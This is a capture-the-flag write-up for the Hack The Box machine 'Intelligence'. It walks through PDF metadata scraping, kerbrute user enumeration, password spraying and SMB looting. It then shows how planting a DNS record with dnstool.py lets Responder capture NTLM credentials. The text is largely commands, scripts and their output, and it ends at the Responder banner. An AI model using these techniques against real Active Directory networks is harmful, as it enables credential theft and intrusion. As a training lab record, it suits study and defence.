Intelligence-htb-writeup

0x00 Skills covered

Skills in this chapter: bulk extraction of PDF creator metadata, bulk PDF download, sensitive information disclosure in PDF content, validating domain usernames with kerbrute, password spraying against domain users, sensitive information disclosure over SMB, NTLMv2 capture and offline cracking, krbrelayx / dnstool, Responder, domain enumeration and abuse with BloodHound, abusing ReadGMSAPassword, forging a service ticket, and using that ticket to log on to the domain controller.

Reference: https://0xdf.gitlab.io/2021/11/27/htb-intelligence.html

Reference: https://teemuhakkarainen.com/hack-the-box-intelligence/

0x01 User access

1. Target IP: 10.10.10.248

2. Scan for open ports (a full-range SYN scan first, then service detection on the ports found):

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.248
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 22:34 CST
Nmap scan report for 10.10.10.248
Host is up (0.40s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49683/tcp open unknown
49684/tcp open unknown
49694/tcp open unknown
49743/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 34.79 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49683,49684,49694,49743,

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49683,49684,49694,49743 -sC -sV --min-rate=10000 10.10.10.248
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 22:35 CST
Nmap scan report for 10.10.10.248
Host is up (0.36s latency).

PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Intelligence
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-29T21:38:40+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2024-03-29T21:38:37+00:00; +7h00m00s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-29T21:38:42+00:00; +6h59m57s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-29T21:38:42+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open adws?
49667/tcp open msrpc Microsoft Windows RPC
49683/tcp open tcpwrapped
49684/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49743/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 1s, median: 6h59m59s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-03-29T21:38:04
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.95 seconds

3. Add the domain names found in the LDAP output and certificate to /etc/hosts:

┌──(root㉿offsec)-[~]
└─# echo '10.10.10.248 intelligence.htb dc.intelligence.htb' >> /etc/hosts

4. The other ports were tried without any immediate findings, so start with the web server on port 80:

http://10.10.10.248/
http://intelligence.htb/

5. Subdomain (vhost) enumeration was also done, but every new name resolves to the same page content, so the entry point is still this website.

6. The site hosts many PDF files, for example:

http://10.10.10.248/documents/2020-01-01-upload.pdf

http://10.10.10.248/documents/2020-12-15-upload.pdf

┌──(kali㉿offsec)-[~/Desktop]
└─$ exiftool 2020-01-01-upload.pdf
ExifTool Version Number : 12.70
File Name : 2020-01-01-upload.pdf
Directory : .
File Size : 27 kB
File Modification Date/Time : 2024:03:29 23:29:36+08:00
File Access Date/Time : 2024:03:29 23:29:37+08:00
File Inode Change Date/Time : 2024:03:29 23:29:36+08:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : William.Lee

┌──(kali㉿offsec)-[~/Desktop]
└─$ exiftool 2020-12-15-upload.pdf
ExifTool Version Number : 12.70
File Name : 2020-12-15-upload.pdf
Directory : .
File Size : 27 kB
File Modification Date/Time : 2024:03:29 23:29:44+08:00
File Access Date/Time : 2024:03:29 23:29:45+08:00
File Inode Change Date/Time : 2024:03:29 23:29:44+08:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : Jose.Williams

7. Both PDFs carry a Creator field in the form First.Last, which looks like a domain username format. The filenames follow a date pattern, so the whole set can be enumerated; the author used Burp Intruder for that.

8. Some of the PDF contents are sensitive:

http://intelligence.htb/documents/2020-06-04-upload.pdf

New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.

http://intelligence.htb/documents/2020-12-30-upload.pdf

Internal IT Update
There has recently been some outages on our web servers. Ted has gotten a
script in place to help notify us if this happens again.
Also, after discussion following our recent security audit we are in the process
of locking down our service accounts

9. We now have the default password but still need usernames. The PDF metadata above already exposes some (the Creator field), so instead of collecting them by hand, use the script from the reference writeup: it walks every date-named URL, records the creator of each PDF and prints any document whose text mentions interesting keywords:

#!/usr/bin/env python3
# Walk the date-named PDF URLs, collect the /Creator metadata field (candidate
# usernames) and print every document whose text contains an interesting keyword.
import datetime
import io

import requests
from PyPDF2 import PdfReader  # PyPDF2 >= 2.0; the PdfFileReader/getDocumentInfo API
                              # used in the original script was removed in PyPDF2 3.x

t = datetime.datetime(2020, 1, 1)
end = datetime.datetime(2021, 7, 4)
keywords = ['user', 'password', 'account', 'intelligence', 'htb', 'login', 'service', 'new']
users = set()

while t < end:
    url = t.strftime("http://10.10.10.248/documents/%Y-%m-%d-upload.pdf")
    resp = requests.get(url)
    if resp.status_code == 200:
        with io.BytesIO(resp.content) as data:
            pdf = PdfReader(data)
            meta = pdf.metadata
            creator = meta.get('/Creator') if meta else None  # not every PDF has one
            if creator:
                users.add(creator)
            for page in pdf.pages:
                text = page.extract_text() or ''
                if any(k in text.lower() for k in keywords):
                    print(f'==={url}===\n{text}')
    t += datetime.timedelta(days=1)

with open('users', 'w') as f:
    f.write('\n'.join(users))

┌──(kali㉿offsec)-[~/Desktop/test]
└─$ sudo python3 test.py
===http://10.10.10.248/documents/2020-06-04-upload.pdf===
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
===http://10.10.10.248/documents/2020-12-30-upload.pdf===
Internal IT Update
There has recently been some outages on our web servers. Ted has gotten a
script in place to help notify us if this happens again.
Also, after discussion following our recent security audit we are in the process
of locking down our service accounts.

┌──(kali㉿offsec)-[~/Desktop/test]
└─$ cat users
Stephanie.Young
Anita.Roberts
Thomas.Valenzuela
Brian.Morris
Ian.Duncan
Daniel.Shelton
Scott.Scott
David.Reed
Jason.Patterson
Thomas.Hall
Jennifer.Thomas
David.Wilson
Tiffany.Molina
Richard.Williams
Kaitlyn.Zimmerman
Travis.Evans
Brian.Baker
William.Lee
Jessica.Moody
John.Coleman
Samuel.Richardson
Veronica.Patel
Danny.Matthews
Jose.Williams
David.Mcbride
Jason.Wright
Teresa.Williamson
Kelly.Long
Nicole.Brock
Darryl.Harris

10. These names still have to be confirmed as real accounts. Since the target is a domain controller, kerbrute can check them against the KDC: it sends an AS-REQ without pre-authentication, and the KDC answers differently for an unknown principal than for a known one that needs pre-auth, so no password is needed and no failed-logon count is incurred (it does log event 4768 on the DC):

┌──(kali㉿offsec)-[~/Desktop/test]
└─$ ../tools/kerbrute userenum -d intelligence.htb --dc 10.10.10.248 users

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: dev (n/a) - 04/01/24 - Ronnie Flathers @ropnop

2024/04/01 22:03:19 > Using KDC(s):
2024/04/01 22:03:19 > 10.10.10.248:88

2024/04/01 22:03:19 > [+] VALID USERNAME: Thomas.Valenzuela@intelligence.htb
2024/04/01 22:03:19 > [+] VALID USERNAME: David.Reed@intelligence.htb
2024/04/01 22:03:19 > [+] VALID USERNAME: Daniel.Shelton@intelligence.htb
2024/04/01 22:03:19 > [+] VALID USERNAME: Stephanie.Young@intelligence.htb
2024/04/01 22:03:19 > [+] VALID USERNAME: Ian.Duncan@intelligence.htb
2024/04/01 22:03:19 > [+] VALID USERNAME: Anita.Roberts@intelligence.htb
2024/04/01 22:03:19 > [+] VALID USERNAME: Jason.Patterson@intelligence.htb
2024/04/01 22:03:19 > [+] VALID USERNAME: Scott.Scott@intelligence.htb
2024/04/01 22:03:19 > [+] VALID USERNAME: Brian.Morris@intelligence.htb
2024/04/01 22:03:20 > [+] VALID USERNAME: David.Wilson@intelligence.htb
2024/04/01 22:03:20 > [+] VALID USERNAME: Travis.Evans@intelligence.htb
2024/04/01 22:03:20 > [+] VALID USERNAME: Richard.Williams@intelligence.htb
2024/04/01 22:03:20 > [+] VALID USERNAME: Kaitlyn.Zimmerman@intelligence.htb
2024/04/01 22:03:20 > [+] VALID USERNAME: Jennifer.Thomas@intelligence.htb
2024/04/01 22:03:20 > [+] VALID USERNAME: William.Lee@intelligence.htb
2024/04/01 22:03:20 > [+] VALID USERNAME: Jessica.Moody@intelligence.htb
2024/04/01 22:03:20 > [+] VALID USERNAME: Brian.Baker@intelligence.htb
2024/04/01 22:03:20 > [+] VALID USERNAME: Tiffany.Molina@intelligence.htb
2024/04/01 22:03:20 > [+] VALID USERNAME: Samuel.Richardson@intelligence.htb
2024/04/01 22:03:20 > [+] VALID USERNAME: David.Mcbride@intelligence.htb
2024/04/01 22:03:20 > [+] VALID USERNAME: Veronica.Patel@intelligence.htb
2024/04/01 22:03:20 > [+] VALID USERNAME: John.Coleman@intelligence.htb
2024/04/01 22:03:21 > [+] VALID USERNAME: Nicole.Brock@intelligence.htb
2024/04/01 22:03:21 > [+] VALID USERNAME: Darryl.Harris@intelligence.htb
2024/04/01 22:03:25 > [+] VALID USERNAME: Thomas.Hall@intelligence.htb
2024/04/01 22:03:25 > [+] VALID USERNAME: Kelly.Long@intelligence.htb
2024/04/01 22:03:25 > [+] VALID USERNAME: Jason.Wright@intelligence.htb
2024/04/01 22:03:25 > [+] VALID USERNAME: Teresa.Williamson@intelligence.htb
2024/04/01 22:03:25 > [+] VALID USERNAME: Danny.Matthews@intelligence.htb
2024/04/01 22:03:25 > [+] VALID USERNAME: Jose.Williams@intelligence.htb
2024/04/01 22:03:25 > Done! Tested 30 usernames (30 valid) in 6.406 seconds

11. Next, spray the default password across the validated users with crackmapexec. This is a password spray (one password against many accounts), so check the lockout policy first; --continue-on-success keeps going after a hit instead of stopping at the first valid login:

┌──(kali㉿offsec)-[~/Desktop/test]
└─$ crackmapexec smb 10.10.10.248 -u users -p 'NewIntelligenceCorpUser9876' --continue-on-success
SMB 10.10.10.248 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.248 445 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Thomas.Hall:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
SMB 10.10.10.248 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE

12. One account still uses the default password. Use it to list the SMB shares:

[+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient -L 10.10.10.248 -U Tiffany.Molina%'NewIntelligenceCorpUser9876'

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.248 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available


┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.10.248 -u Tiffany.Molina -p 'NewIntelligenceCorpUser9876'

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.10.248:445 Name: intelligence.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ ONLY
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY

13. Everything is read-only, no write access anywhere, so browse the readable shares for files:

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.248\\Users -U Tiffany.Molina%'NewIntelligenceCorpUser9876'
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Mon Apr 19 09:20:26 2021
.. DR 0 Mon Apr 19 09:20:26 2021
Administrator D 0 Mon Apr 19 08:18:39 2021
All Users DHSrn 0 Sat Sep 15 15:21:46 2018
Default DHR 0 Mon Apr 19 10:17:40 2021
Default User DHSrn 0 Sat Sep 15 15:21:46 2018
desktop.ini AHS 174 Sat Sep 15 15:11:27 2018
Public DR 0 Mon Apr 19 08:18:39 2021
Ted.Graves D 0 Mon Apr 19 09:20:26 2021
Tiffany.Molina D 0 Mon Apr 19 08:51:46 2021

3770367 blocks of size 4096. 1461870 blocks available
smb: \> cd Tiffany.Molina\
smb: \Tiffany.Molina\> ls
. D 0 Mon Apr 19 08:51:46 2021
.. D 0 Mon Apr 19 08:51:46 2021
AppData DH 0 Mon Apr 19 08:51:46 2021
Application Data DHSrn 0 Mon Apr 19 08:51:46 2021
Cookies DHSrn 0 Mon Apr 19 08:51:46 2021
Desktop DR 0 Mon Apr 19 08:51:46 2021
Documents DR 0 Mon Apr 19 08:51:46 2021
Downloads DR 0 Sat Sep 15 15:12:33 2018
Favorites DR 0 Sat Sep 15 15:12:33 2018
Links DR 0 Sat Sep 15 15:12:33 2018
Local Settings DHSrn 0 Mon Apr 19 08:51:46 2021
Music DR 0 Sat Sep 15 15:12:33 2018
My Documents DHSrn 0 Mon Apr 19 08:51:46 2021
NetHood DHSrn 0 Mon Apr 19 08:51:46 2021
NTUSER.DAT AHn 131072 Tue Apr 2 04:48:57 2024
ntuser.dat.LOG1 AHS 86016 Mon Apr 19 08:51:46 2021
ntuser.dat.LOG2 AHS 0 Mon Apr 19 08:51:46 2021
NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TM.blf AHS 65536 Mon Apr 19 08:51:46 2021
NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Apr 19 08:51:46 2021
NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Apr 19 08:51:46 2021
ntuser.ini AHS 20 Mon Apr 19 08:51:46 2021
Pictures DR 0 Sat Sep 15 15:12:33 2018
Recent DHSrn 0 Mon Apr 19 08:51:46 2021
Saved Games D 0 Sat Sep 15 15:12:33 2018
SendTo DHSrn 0 Mon Apr 19 08:51:46 2021
Start Menu DHSrn 0 Mon Apr 19 08:51:46 2021
Templates DHSrn 0 Mon Apr 19 08:51:46 2021
Videos DR 0 Sat Sep 15 15:12:33 2018

3770367 blocks of size 4096. 1461870 blocks available
smb: \Tiffany.Molina\> cd Desktop\
smb: \Tiffany.Molina\Desktop\> ls
. DR 0 Mon Apr 19 08:51:46 2021
.. DR 0 Mon Apr 19 08:51:46 2021
user.txt AR 34 Tue Apr 2 04:39:39 2024

3770367 blocks of size 4096. 1461870 blocks available
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Tiffany.Molina\Desktop\>

14. That is the first flag:

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat user.txt
60651dd079df97c917365dcbffd853ad

0x02 System access

15. The earlier SMB enumeration also turned up a script in the IT share:

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient \\\\10.10.10.248\\IT -U Tiffany.Molina%'NewIntelligenceCorpUser9876'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Apr 19 08:50:55 2021
.. D 0 Mon Apr 19 08:50:55 2021
downdetector.ps1 A 1046 Mon Apr 19 08:50:55 2021

3770367 blocks of size 4096. 1461870 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> exit

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if(.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}

The script uses the ActiveDirectory module's AD: drive to enumerate the AD-integrated DNS zone intelligence.htb (the DomainDnsZones partition, so these are DNS records, not computer objects) and loops over every record whose name starts with "web". For each one it requests http://<name> with -UseDefaultCredentials, i.e. it authenticates as whatever account runs the scheduled task if the server challenges it, and if the status code is not 200 it e-mails Ted.Graves that the host is down (the bare .StatusCode is how the file reads on the box). The comment at the top says it is scheduled every five minutes. Two properties matter for us: any DNS name starting with web* will be contacted, and the request will carry NTLM authentication to whichever host that name resolves to.

16. This points to capturing NTLM authentication: if we can add a DNS record named web* that resolves to our machine, the scheduled script will connect to us and authenticate with NTLMv2. dnstool.py from the krbrelayx toolkit can add that record.

dnstool.py is a script shipped with krbrelayx:

https://github.com/dirkjanm/krbrelayx

It adds, modifies or deletes Active Directory-integrated DNS records over LDAP. By default any authenticated domain user may create child objects in an AD-integrated zone, which is why a plain user such as Tiffany.Molina can add records.

It is worth testing whether Tiffany.Molina can make such a change, using the following options:

-u intelligence\\Tiffany.Molina  the user to authenticate as;
-p NewIntelligenceCorpUser9876  that user's password;
--action add  add a new record;
--record web-shiyan  the record (host name) to add; it must start with "web" to be matched by the script's filter;
--data 10.10.14.11  the record data, here the IP the name should resolve to (our tun0 address);
--type A  the record type.
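To make concrete what dnstool.py writes for the script above to pick up, here is an added example (not code from the writeup or from krbrelayx) of the two pieces involved: the MS-DNSP DNS_RECORD encoding stored in a dnsNode's dnsRecord attribute, and the LDAP add of that node under the very zone DN that downdetector.ps1 enumerates. RecordingConnection is a hypothetical stand-in for an ldap3 Connection with the same add() shape, so the code runs offline and never talks to a DC; the real tool additionally looks up the zone's SOA serial and sets objectCategory, which is omitted here.

```python
"""Added example: encode an A record the way AD-integrated DNS stores it and
add the dnsNode over LDAP (what `dnstool.py -a add -t A` does, simplified).
RecordingConnection is a hypothetical ldap3.Connection stand-in (offline)."""
import socket
import struct

# Zone DN from downdetector.ps1; new nodes appear under it as DC=<name>,...
ZONE_DN = "DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb"
DNS_TYPE_A = 0x0001
RANK_ZONE = 0xF0          # authoritative zone data (dnstool writes 240)
DEFAULT_TTL = 180         # seconds, same default as dnstool


def build_a_record(ip: str, serial: int = 1, ttl: int = DEFAULT_TTL) -> bytes:
    """Serialise one MS-DNSP DNS_RECORD carrying an A record.
    Layout: DataLength, Type, Version(5), Rank, Flags, Serial (little-endian),
    TtlSeconds (big-endian!), Reserved, TimeStamp (0 = static, never aged), Data."""
    data = socket.inet_aton(ip)
    return (struct.pack("<HHBBHI", len(data), DNS_TYPE_A, 5, RANK_ZONE, 0, serial)
            + struct.pack(">I", ttl) + struct.pack("<II", 0, 0) + data)


def parse_record(rec: bytes) -> dict:
    """Decode a dnsRecord value (roughly what `dnstool.py -a query` prints)."""
    data_len, rtype, _version, rank, _flags, serial = struct.unpack_from("<HHBBHI", rec, 0)
    ttl = struct.unpack_from(">I", rec, 12)[0]
    timestamp = struct.unpack_from("<I", rec, 20)[0]
    data = rec[24:24 + data_len]
    out = {"type": rtype, "rank": rank, "serial": serial, "ttl": ttl,
           "static": timestamp == 0}
    if rtype == DNS_TYPE_A:
        out["ip"] = socket.inet_ntoa(data)
    return out


def node_dn(name: str) -> str:
    """DN of the dnsNode for <name>.intelligence.htb."""
    return f"DC={name},{ZONE_DN}"


def add_a_record(conn, name: str, ip: str, serial: int = 1) -> bool:
    """dnstool -a add -t A: create the dnsNode holding a single A record."""
    if not name.lower().startswith("web"):
        print(f"warning: {name} will not match the script's Name -like 'web*' filter")
    return conn.add(node_dn(name), ["top", "dnsNode"],
                    {"dnsRecord": [build_a_record(ip, serial)], "dNSTombstoned": False})


class RecordingConnection:
    """Hypothetical stand-in for ldap3.Connection: records add() calls instead of binding."""
    def __init__(self):
        self.adds = []

    def add(self, dn, object_class, attributes):
        self.adds.append((dn, object_class, attributes))
        return True


if __name__ == "__main__":
    conn = RecordingConnection()
    add_a_record(conn, "web-shiyan", "10.10.14.11")   # same values as the dnstool run below
    dn, _, attrs = conn.adds[0]
    print(dn)
    print(parse_record(attrs["dnsRecord"][0]))
```

The two details most often got wrong when hand-crafting these records are the big-endian TTL in an otherwise little-endian structure and the zero TimeStamp, which marks the record static so scavenging never removes it. With a real ldap3 connection the add() call is the same; the DNS server only notices the new node on its next poll of the directory, so allow a few minutes before expecting the script to resolve the name.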

17. Set up the listener and trigger the callback. A plain nc listener on port 80 only ever sees the unauthenticated GET (first block below): Invoke-WebRequest only sends credentials after a 401 challenge, which Responder's HTTP server provides, so stop nc before starting Responder so that port 80 is free. The DNS server picks up the new LDAP node only on its next directory poll and the task runs every five minutes, so expect to wait a few minutes for the hash:

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.248] 50065
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17763.1852
Host: web1
Connection: Keep-Alive

┌──(kali㉿offsec)-[~/Desktop/tools/krbrelayx]
└─$ python3 dnstool.py -u 'intelligence\Tiffany.Molina' -p NewIntelligenceCorpUser9876 10.10.10.248 -a add -r web-shiyan -d 10.10.14.11 -t A --allow-multiple
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding extra record
[+] LDAP operation completed successfully


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo responder -I tun0 -w -d
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS, LLMNR & MDNS Responder 3.1.4.0

To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder

Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C


[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
